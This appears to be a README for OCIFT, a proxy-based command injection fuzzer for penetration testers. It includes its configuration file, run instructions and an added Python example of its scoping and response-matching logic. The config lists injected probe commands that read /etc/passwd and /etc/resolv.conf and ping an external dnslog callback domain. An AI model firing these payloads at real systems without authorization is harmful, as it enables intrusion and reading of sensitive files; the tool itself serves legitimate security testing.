A semi-automated command injection vulnerability fuzz tool (One Semi-automation command injection vulnerability Fuzz tool)
A semi-automated command injection vulnerability fuzz tool (One Semi-automation command injection vulnerability Fuzz tool), abbreviated as OCIFT.
This is a semi-automated black-box testing tool. It lets penetration testers or code auditors browse the target application normally while the tool digs for command injection vulnerabilities in the requests that pass through.
It is a proxy server built on Tornado: it parses each GET/POST request, extracts the fuzz points (the request parameters), substitutes payloads into them, and sends the resulting requests for fuzz testing.
|____run.py           main program entry
|____dnslog.py        DNSLog SDK
|____fuzz.conf        configuration file
|____fuzz.py          fuzz thread
|____make_payload.py  payload generator
|____readme.md        documentation
[initconfig]
black_hosts =.gov,localhost,127.0.0.1,google,gstatic,cnzz.com,doubleclick,police,mil.cn,gov.cn,gov.com
url_ext_black =.ico,.flv,.css,.jpg,.png,.jpeg,.gif,.pdf,.ss3,.txt,.rar,.zip,.avi,.mp4,.swf,.wmi,.exe,.mpeg
white_site =qunar
timeout =10
my_cloudeye =ano1qu2j.xfkxfk.com
checkkeys =110586256,/bin/bash,nameserver,IPv4,Windows IP
base_command =cat /etc/resolv.conf,echo 110586256,cat /etc/passwd,ipconfig,ping CommandInj.{my_cloudeye},echo 110586256<nul
fuzz_count =20
commix_payload_type = False
dnslog_sessionid =q6wva2e3skg79vkdegra2bygft0d1
custom_domain =a2fta2j
Logfile =rce_success_results.txt
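The following is an added example, not OCIFT's own code, showing how the configuration above drives the proxy's scoping and checking logic: it parses the fuzz.conf shown above, decides whether an intercepted request is in scope (black_hosts and url_ext_black exclude, white_site restricts), extracts fuzz points from GET query strings and POST form bodies as the proxy description implies, expands the {my_cloudeye} placeholder in base_command, and scans a response body for the configured checkkeys. The precedence of white_site over black_hosts, the substring host match, and the sample request are assumptions; the conf text is a constructed copy of the page's values.

```python
# Added example (not OCIFT's own code): load fuzz.conf, apply its scoping
# rules, extract fuzz points, and scan responses for the configured check keys.
import configparser
from urllib.parse import urlsplit, parse_qsl

# Constructed copy of the fuzz.conf shown on the page.
FUZZ_CONF = """
[initconfig]
black_hosts =.gov,localhost,127.0.0.1,google,gstatic,cnzz.com,doubleclick,police,mil.cn,gov.cn,gov.com
url_ext_black =.ico,.flv,.css,.jpg,.png,.jpeg,.gif,.pdf,.ss3,.txt,.rar,.zip,.avi,.mp4,.swf,.wmi,.exe,.mpeg
white_site =qunar
timeout =10
my_cloudeye =ano1qu2j.xfkxfk.com
checkkeys =110586256,/bin/bash,nameserver,IPv4,Windows IP
base_command =cat /etc/resolv.conf,echo 110586256,cat /etc/passwd,ipconfig,ping CommandInj.{my_cloudeye},echo 110586256<nul
fuzz_count =20
commix_payload_type = False
Logfile =rce_success_results.txt
"""


def load_config(text):
    """Parse the [initconfig] section into lists and typed scalars."""
    cp = configparser.ConfigParser(interpolation=None)  # keep {my_cloudeye} literal
    cp.read_string(text)
    sec = cp["initconfig"]

    def csv(key):
        return [v.strip() for v in sec[key].split(",") if v.strip()]

    return {
        "black_hosts": csv("black_hosts"),
        "url_ext_black": [e.lower() for e in csv("url_ext_black")],
        "white_site": csv("white_site"),
        "checkkeys": csv("checkkeys"),
        "base_command": csv("base_command"),
        "my_cloudeye": sec["my_cloudeye"].strip(),
        "timeout": sec.getint("timeout"),
        "fuzz_count": sec.getint("fuzz_count"),
        "logfile": sec["logfile"].strip(),  # configparser lowercases option names
    }


def in_scope(cfg, url):
    """Assumed scoping rule: blacklisted hosts and static-file extensions are
    skipped; when white_site is set, only hosts containing one of its entries
    are fuzzed."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    path = parts.path.lower()
    if any(b in host for b in cfg["black_hosts"]):
        return False
    if any(path.endswith(ext) for ext in cfg["url_ext_black"]):
        return False
    if cfg["white_site"] and not any(w in host for w in cfg["white_site"]):
        return False
    return True


def fuzz_points(method, url, body=""):
    """Return (location, name, value) triples for every request parameter:
    query-string parameters for any method, plus form-body parameters for POST."""
    points = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        points.append(("query", name, value))
    if method.upper() == "POST" and body:
        for name, value in parse_qsl(body, keep_blank_values=True):
            points.append(("body", name, value))
    return points


def expand_commands(cfg):
    """Substitute the configured cloudeye domain into base_command entries."""
    return [c.replace("{my_cloudeye}", cfg["my_cloudeye"]) for c in cfg["base_command"]]


def matched_checkkeys(cfg, response_text):
    """Check keys found in a response body: evidence that a command ran."""
    return [k for k in cfg["checkkeys"] if k in response_text]


if __name__ == "__main__":
    cfg = load_config(FUZZ_CONF)
    # Constructed sample request; the host is a placeholder matching white_site.
    method, url, body = "POST", "http://app.qunar.example/search?q=1", "name=a&page="
    print("in scope:", in_scope(cfg, url))
    print("fuzz points:", fuzz_points(method, url, body))
    print("commands:", expand_commands(cfg))
    print("hits:", matched_checkkeys(cfg, "root:x:0:0:root:/root:/bin/bash"))
```

The extension and host checks run before the whitelist so that static resources and excluded hosts are never fuzzed regardless of white_site; the response check is the same string-match logic a log reviewer would apply to spot a successful injection in the saved results.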
pip install tornado
pip install requests
python run.py 8089
As shown in the figure below: